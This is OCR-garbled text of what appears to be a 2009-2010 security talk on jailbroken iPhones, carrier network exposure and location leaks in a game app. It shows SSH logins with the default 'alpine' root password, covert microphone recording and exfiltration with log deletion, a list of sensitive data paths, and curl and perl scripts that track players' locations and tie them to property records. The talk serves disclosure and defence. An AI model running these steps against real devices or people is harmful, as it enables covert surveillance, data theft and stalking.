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Old Smartphone Best 

Practices 








Bad 




Good 



New Smartphone Best 

Practices 



IT will use the iPhone Configuration 
Utility so you can talk to Exchange, use 
the VPN, wireless, etc. 

Get iFart, it's hilarious. 




If AT&T is in attendance: 



Facts about AT&T and me: 

• I enjoy my AT&T wireless service 

» Feel that I have fantastic coverage everywhere I go at 
all times 

• Am sure you have the largest/fastest 3G network, 
regardless of whatVZW says 

• Looking forward to years of receiving quality service 
from you 

• Would love to chat 




J ail breaking 





blackra I n 



pwnagetoo 




It opens up a whole new world 

of applications 



common Unix 
binaries 

sshd 

tethering 

pirate software 

super easy to JB your 
phone 




mpact on security 



"Jail breaking removes 80% of the 
iPhone's security precautions" 

Charlie Miller, SyScan 2009 



How many iPhones are 

jail broken? 



6.93% 



Piracy in the Appstore 




□ Share .'Favorite n Get File More... 




Jai breaker^ Pi rate 


Distinct devices 


Distinct devices 


we've counted 


we've counted 


that have been 


that have 


jailbroken: 


installed pirated 




apps: 


-4.0M 


-1.5M 


^i pinch media 




share H 4 £> 


> N f~6"/12 ^full 



Unique Users by Jailbroken Phones [week of 5/17/09) 



S.93% 




Non Jailbroken Phones 
Ja broken Phones 



[ I ] http://www.slideshare.net/pinchmedia/piracy-on-the-appstore 
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Global Stats 
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Jailbroken Devices 



ifconfig 



root# ifconfig 
loO:flags=8049<UP,LOOPBACK,RUNNING,MULTICAST> mtu 16384 

inet 1 27.0.0. 1 netmask OxffOOOOOO 
enO: flags=8963<UP,BROADCAST,SMART,RUNNING,PROMISC,SIMPLEX,MULTICAST> mtu 1 500 

ether 00:2 1 :e9:09:e3:4f 
pdp_ip0:flags=80l l<URPOINTOPOINT,MULTICAST> mtu 1450 

inet 1 0.69.62.220 -> 1 0.69.62.220 netmask Oxffffffff 
pdp_ipl:flags=80l l<URPOINTOPOINT,MULTICAST> mtu 1450 
pdp_ip2:flags=80l KUP,POINTOPOINT,MULTICAST> mtu 1024 
pdp_ip3:flags=80l KUP,POINTOPOINT,MULTICAST> mtu 1024 
en I : flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1 500 

inet 1 92. 1 68.20. 1 netmask OxffffffOO broadcast 192.168.20.255 

ether 0a:0b:ad:0b:ab:e0 



Interfaces 



enO = 802. 1 I interface 

pdp_ipO = primary cellular interface on APN: 
wap.cingular 

pdp ip I = activates when retrieving visual 

voicemail on APN: acds.voicemail 

pdp_ip2 = not sure 

pdp_ip3 = used with tethering 



ifconfig 



pdp_ipO:flags=8011<URPOINTOPOINT,MULTICAST> 
mtu 1450 

inet 10.69.62.220 ■■> 10.69.62.220 netmask 
Oxffffffff 



sshd 




sam 

Status: 

Chief of Administration 

iPhqne Dev Team 



i Phone Root Pwsword Cracked 



We managed to obtain and crack Che hashs of Che user passwords for Che iPhone OS. 
Edit: cause you digg people broke the poor wllcl: 

The password for root is rr alpine N 

The "mobile" user accounts password is "dottke" 

Is it sick to have root pa sword to all i Phones worldwide? Well not really, there is no 



So what? 



Until (about) October 1 6, 2009 AT&T did 
not filter device to device IP network 

traffic. 



AT&T's Network 



Most people think it looks like this: 




AT&T's Network 



Actually, more like this: 




Multiple /16's 



Your smartphone (and laptop/ 
blackberry, etc.) has been on one giant 

flat network... 



So I started looking around... 



Scans 






ranges 




Devices On the Network 



0,589* IPs scanned 



Count 


Port 


What? 


83 


22 


sshd 


24 


80 


http 


4 


2008 


PDANet 


3,644 


62078 


iPhone Default 



Other stuff out there 



Saw a Linux box with sshd 

Windows Mobile devices 

Blackberries 

Windows PC's 

PDANet for the iPhone is an open proxy. 



OOO Mozilla Firefox - 


- (Build 2O0&12O121) 




-^ -°l 


H ) » CO) C-) (#) CUl http://10.72.3L4/ 




ft O " (G T Google 


Q © - 








Vh. 


MO SI VISItcQ * 



HI 



PdaNct Registration 

* unlock full version * 



Email Address: 








Serial Number: 





(Submit Registration j 



(Purchase License (529) ) 



PdaNet is currently running in trial mode (8 days left). 
Please paste serial number from your order receipt email 



© p" R Proxy: SSH Tunnel ^ 



ssh access between phones 



Trevors-iPhone:- root# ssh root@10 . 69 . 62 . 100 

Password : [ alpine ] 

Nates-iPhone : ~ root# 

Nates-iPhone:- root# id 

uid=0 ( root ) gid=0 (wheel ) groups=0 (wheel ) , 1 
( daemon ) , 2 ( kmem ) , 3 ( sy s ) ,4( tty ) , 5 ( operator ) , 8 
(procview) , 9 (procmod) , 20 (staff) , 29 
(certusers) , 80 (admin) 



Filesystem Guide 



Interesting stuff: 

/private/var/mobile/L 
/private/var/mobile/L 
/private/var/mobile/L 
/private/var/mobile/L 
/private/var/mobile/L 
/private/var/mobile/L 



brary/Mail - Email (I MAR Exchange, POP3, etc.) 
brary/SMS - SMS Text Messages 
brary/Voicemail - Voicemail in .amr format 
brary/AddressBook - Contacts 
brary/CallHistory - Call History 
brary/Notes - Notes 



/pr 
/pr 
/pr 
/pr 
/pr 
/pr 
/pr 
/pr 
/pr 
/pr 
/pr 
/pr 
/pr 
/pr 
/pr 
/pr 
/pr 
/pr 
/pr 
/pr 



vate/var/mob 
vate/var/mob 
vate/var/mob 
vate/var/mob 
vate/var/mob 
vate/var/mob 
vate/var/mob 
vate/var/mob 
vate/var/mob 
vate/var/mob 
vate/var/mob 
vate/var/mob 
vate/var/mob 
vate/var/mob 
vate/var/mob 
vate/var/mob 
vate/var/mob 
vate/var/mob 
vate/var/mob 
vate/var/mob 



le/Library/CallHistory/call_history.db 

le/Library/AddressBook/AddressBook.sqlitedb 

le/Library/AddressBook/Addressbooklmages.sqlitedb 

le/Library/Cookies/Cookies.plist 

le/Library/Keyboard/dynamic-text.dat 

le/Library/Mail/Accounts.plist 

le/Library/Mail/(mail account name)/Deleted Messages 

le/Library/Mail/(mail account name)/Sent Messages 

le/Library/Mail/(mail account name)/INBOX 

le/Library/Maps/History.plist 

le/Library/YouTube/Bookmarks.plist 

le/Library/Voicemail/(amr files) 

le/Library/Voicemail/voicemail.db 

le/Library/Safari/Bookmarks.plist 

le/Library/Safari/History.plist 

le/Library/Suspend.plist 

le/Library/Safari/SuspendState.plist 

le/Library/Safari/SMS/sms.db 

le/Library/Preference/(various preference Plists) 

le/Library/Notes/notes.db 



Let's do a bit more 



Erica Utilities - cmd line utilities for the 
iPhone 



recAudio 



recAudio: Record audio from the 
onboard microphone. 



findme 



Queries the iPhone's GPS API to 
return latitude/longitude 



Attacker 



Victim 



recAudio 




y 




recording, a iff 



10.69.62.220 



10.69.62.100 



can hear you typing 



Trevors-iPhone:- root# scp bin/recAudio root@10 . 69 . 62 . 100 

Password: 

recAudio 100% 19KB 

1.3KB/S 00:00 

Trevors-iPhone:- root# ssh root@10 . 69 . 62 . 100 

Password: 

Nates-iPhone:- root# ./recAudio 

Start talking. Press A C to finish. 

Starting recording 

A C 

Interrupted. 

Stopping recording 



Nates-iPhone:- root# Is -1 *.aiff 

-rw-r— r — 1 root wheel 43178 Oct 2 22:35 2009-10-92\ at\ 
22:35:04. aiff 

Nates-iPhone:- root# mv 2009-10-92X at\ 22 :35 : 04 .aif f test. aiff 

Trevors-iPhone: root# scp root@10 . 69 . 62 . 100 :-/* .aif f . 

Password: 

test. aiff 100% 523KB 2.2KB/ 

s 00:00 

Nates-iPhone:- root# rm test. aiff recAudio .bash_history 

Nates-iPhone:- root# last 

wtmp begins at Fri Oct 2 22:41 
Nates-iPhone:- root# 



Other bad things 



./openURL tel:// 1 -900-XXX-XXX 

./openURL tel://9l I or tel://mynumber 

Pillage filesystem: email, sms, notes, app 
data, etc. 

apt-get install tcpdump nmap 

go wild on whatever network enO is 
connected to. 



Worms and Exploits 



Dutch Extortion 



iillT-Mobil* 3Q hacked A hacked O 76% S> 




portantWar 
Your iPhantfs been hacked because it's realty 
insecure! Please visit doiop.com/iHacked and 
secure ycur iPhone right rwwf 

Right new, I «n awes* all your files,. 

This message won't disappear until your [Phoned secure 




ontgrendel 



November 2009 



ikeeWorm 




Batman from the Whirlpool forums 



November 2009 



Exploits 



Phone/Privacy.A* command line tool 
Phone/iBotNetA* worm with C&C 

^Discovered by security firm Intego 



Some good news 

AT&T does segment part of their network: 

• e.g. I could not see friend in CA from DC 

• But I could see friend in Boston 

No easy way to target specific individual (Identity to 
AT&T NAT IP address not super easy) 

• No way to correlate I O.x.x.x IP to person via Safari 

• decloak.net doesn't really work in Mobile Safari 
Man this is slow... 



email to ID user 





<imgsrc="http://10.69.62.220/i.j pg"> 



IdBQ 

ilBSB 




10.69.63.220:80 



10.69.63.110 






10.69.63.220:80 



src:10.69.63.110 
dst:10.69.63.220 






10.69.63.110 



What to do 



Don't Jailbreak your phone if you care about 
security (sorry) 

Change root and mobile users' passwords 

Attention Cydia Folks: Do not bind sshd to pdp 
interfaces; force password change upon install 

IT Folks: Policy on jailbroken iphones 

AT&T: Fi l ter mobi l e to mobi l e I P traff i c 



Privacy and Location 

Based Apps 



Location Based Apps 



Underworld: Sweet Deal 

Drug trafficking game with candy 

Location matters, move product from point 
A to point B 

Phone sends high resolution coordinates to 
game server 



Like Druglords 









-J 



Barney ■< ■. ■' $500 




Underworld: Sweetdeal 





Carters, Loudoun County 



Jim Zorn -jw- $7,000 o 



Serafina ^*^ $6,300 : 



$7,000 110 





CainMarko 

Rank: General (18) 



^V University Park, Centre County, Pennsylvania 



' 34 * $7,700 



Google Maps 




m 



m ■ 



Paros 



Client side proxy 

Configure iPhone to use machine running 
Paros's IP address as proxy 

Watch what your apps send and receive 



Request 



Untitled Session - Paros 












L J 






POST hnp://game. dl.a-steroids.com/TrafficServer/ HTTP/ 1.1 

Host: game.dl.a-steroids.com 

User-Agent: Underworld%20premium/1.4.0 CFNetwork/459 Darwin/10. 0.0d3 Paros/3.2.13 

Cookie: J5E55IONID=ED3E0CF7A73D3A376023E47E2C650737: Path=/ 

Accept: */* 

Accept-Language: en-us 

Conte nt-Typ e : a p p 1 i cati on/ a- www-form -url encoded 

Content- Length: 109 

Connection: keep-alive 

Proxy- Connection: keep-alive 


<?xml version="1.0" encoc 
< Command s>< Command 


ling="UTF-S < ?> 

> <type> GET_GMAP_OEJECTS< /type> < /Command > < /Command s> 






Raw View t 





Response 



Untitled Session - Pa'os 




Request Response Trap 



HTTP/ 1.1 200 OK 

Date: Sun. 24 Jan 2010 21:20:21 GMT 

Server: Apache/2.2,9 (Debian) modjk/l.2.26 PHP/5,2.6-l + lenny2 with Suhos in- Patch 

X-Powered-By Servlet2.4; JBoss-4C5.GA (build: CV5Tag=Branch_4_0 date=200610162339)/Tomcat-5.5 

Keep-Alive timeout=15. max=100 

Connection: Keep-Alive 

Conte nt-Type : te xt/xml : charset= UTF- 8 



<?xml version="1.0" encoding="UTF-8 , ?> 

<Updates><Updatextype>CMAP_OBJECTS</type><radius>S 1 0</radius><players><pi><id>289392</id><flag>true< 
name >^^H</naine><status> Mobster {17)</statusxlat> 39. 12 297058105469 </lat>| 
>0 < /type> < /pl> < plx id > 3 2 3 104 < /id >< flag>true < /flag> < name> ShadyWays < /name : 

lon>-77.543159484B6328</lonxtype>0</typex/plxpl> 



i n ( . 



^f 39 10134L247SSBS9V76. X ft 



f 4 C # ^ http://niaps.googlexom/maps?f-q&source-s_qahl-en&geocodG-&q-3^. 101341247558594,-76, 75fi44573974Gl&sll-3^09904 ► 

Weo Imaaos Videos Maps News Shopping Gmail more t 

Google maps 

Get Directions My Maps 




Report a problem ^ 




Report a problem I fiA 




ta ©2009 Google - Terms of Use 



Report a problem 



Let's pick a non-intel agency 

player 




Waffles offeL 

Carters. Loudoun County 

Jim Zorn *W $7,000 o 




chezk 



Q Q Q G Q Q 



Request 



Untitled Session - Paros 












L J 






POST hnp://game. dl.a-steroids.com/TrafficServer/ HTTP/ 1.1 

Host: game.dl.a-steroids.com 

User-Agent: Underworld%20premium/1.4.0 CFNetwork/459 Darwin/10. 0.0d3 Paros/3.2.13 

Cookie: J5E55IONID=ED3E0CF7A73D3A376023E47E2C650737: Path=/ 

Accept: */* 

Accept-Language: en-us 

Conte nt-Typ e : a p p 1 i cati on/ a- www-form -url encoded 

Content- Length: 109 

Connection: keep-alive 

Proxy- Connection: keep-alive 


<?xml version="1.0" encoc 
< Command s>< Command 


ling="UTF-S < ?> 

> <type> GET_GMAP_OEJECTS< /type> < /Command > < /Command s> 






Raw View t 





Response 



Untitled Session - Pa'os 




Request Response Trap 



HTTP/ 1.1 200 OK 

Date: Sun. 24 Jan 2010 21:20:21 GMT 

Server: Apache/2.2,9 (Debian) modjk/l.2.26 PHP/5,2.6-l + lenny2 with Suhos in- Patch 

X-Powered-By Servlet2.4; JBoss-4C5.GA (build: CV5Tag=Branch_4_0 date=200610162339)/Tomcat-5.5 

Keep-Alive timeout=15. max=100 

Connection: Keep-Alive 

Conte nt-Type : te xt/xml : charset= UTF- 8 



<?xml version="1.0" encoding="UTF-8 , ?> 

<Updates><Updatextype>CMAP_OBJECTS</type><radius>S 1 0</radius><players><pi><id>289392</id><flag>true< 
name >^^H</naine><status> Mobster {17)</statusxlat> 39. 12 297058105469 </lat>| 
>0 < /type> < /pl> < plx id > 3 2 3 104 < /id >< flag>true < /flag> < name> ShadyWays < /name : 

lon>-77.543159484B6328</lonxtype>0</typex/plxpl> 



Lat/Lon to GMaps: 
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County Records 



Rral EiEatc tix, Alignment 4 Parcel Da 
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Real Estate Aaaeaament - 2009 
Own«r and Legal - Residential 



MdgH j RaccfflS***! ^Tat HUfcwyJ 



tan M* ^^^B 
Yht 2QGS 


-m VA2&U7 


Currant Qwntr MimaAddnii 


LuFrani uaaC'Tipticm 
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JLand S>ooa D— crt^a—i 
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RkdhI-kf Dai. VWTOm 
SawPnca $64? D00 
Moa1 nacart -atrumart I 
Dae* fw 2007 



Total Parcel A* nil m#nt Information 



An erf 4** 1»t 

L*TK3 1175 000 
impfo**m*n| £333.500 
far Martial Total 1601 500 
LandUt* fO 
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Stat* Uta Oaatifieaiion URBAN SINGLE FAMILY 
Billing fritaet DULLES 
Elaclffir Oatncl DULLES 



AtifKuttural Dtttncl H* 
County hfcttonc DMtnci 
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Facebook 






Facebook I Pat I 



* 



► + D http://www.fMetwok.comf piofik.php'id 



T 



Rral Est*!* "Hi*, Msf-ssni 




~c] (<V Google 



V hf j k " .« h hu rn - Geog I Howard Forum K Your Ma. , 



faCebOOk Hhm Proflla Friend i Inbox 1 



Tcevor Hawthorn Setting* Logout 




^ Add *» Friend 



_Q Pat only shares certain information with everyone. If you know Pat, add 
hirn as a friend on Facebook. 



Bend Pat a Menage 



Friendi 



5k ah 04 



Repon/fflock thu Person 

I *"*!*! 





"h|Cp , >w^ J ic^bDC'fcxcrri 1 prDhlp php^.d- 



Creair in Ad 

Help Build Families 

Harried? Ydu can promote 
heillhyr* dliurihip** 
marrijgc (p pfffgnirH 
uomari-itd couples 1 
Volunteer through our 
education program. 

■i Uke 



AirStrike 1941 




Dodg-e [he enemy fighters 
In 1941. Can you beat the 
high Kort? 

■i Ljk* 



Free Album 
Dow n load 







1* Chit it) 



!d7Dl4S^rn f 



ff ,r 



Ok neat, what else? 



Near real-time geolocation tracking of 

players 



cURL + perl + crontab = csv + gpsbabel = 
kml + Google Earth = EPIC screen shots 



curl script 



#/bin/sh 
# 

# First login. . . 
# 

curl -s -H "User-Agent: Underworld premium/ 1 . 4 . CFNetwork/459 Darwin/ 
10.0.0d3" -d @/home/trevor/iphone/login.xml — dump-header /home/ 
trevor/iphone/headers .txt http: //game.dl.a-steroids .com/Traf f icServer/ 
# 

# Then update location 

curl -s -H "User-Agent: Underworld premium/ 1 . 4 . CFNetwork/459 Darwin/ 
10.0.0d3" -b /home/trevor/iphone/headers.txt -d @/home/trevor/iphone/ 
update_loc . xml http: //game.dl.a-steroids .com/Traf f icServer/ 
# 

# Get GMap obhjects 

curl -s -H "User-Agent: Underworld premium/ 1 . 4 . CFNetwork/459 Darwin/ 
10.0.0d3" -b /home/trevor/iphone/headers.txt -d @/home/trevor/iphone/ 
gmap_update . xml http : / /game . dl . a-steroids . com/Traf f icServer/ 



perl script 



#! /usr/bin/perl 

use strict; 
use warnings; 

# make single or multiline input into one scalar 
my $glob = join( ' ' ,(<>)); 

# extract name-to-flag records 

my ^records = $glob =~ / (<name>. *?<\/lon>) /ig; 

for (^records) 

{ 

my ( $name, $lat,$lon) = $_ =~ 

qr |<name>( . *? )</name>. *?<lat>( [\-\d\. ] * )</lat><lon>( [\-\d 

\. ]*)</lon>| i; 

print "$lat,$lon,$name\n" ; 

} 



perl script output 





} 

1 
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* " " ■. 20 LO Google. ^ 

Image District of Columbia f DC CIS) 



Comments/Feedback: 

trevor.hawthorn@stratumsecurity.com 

www.stratumsecurity.com 

Twitter: 
@packetwerks 
stratumsecurity 




Special Thanks: Tiago Stock 



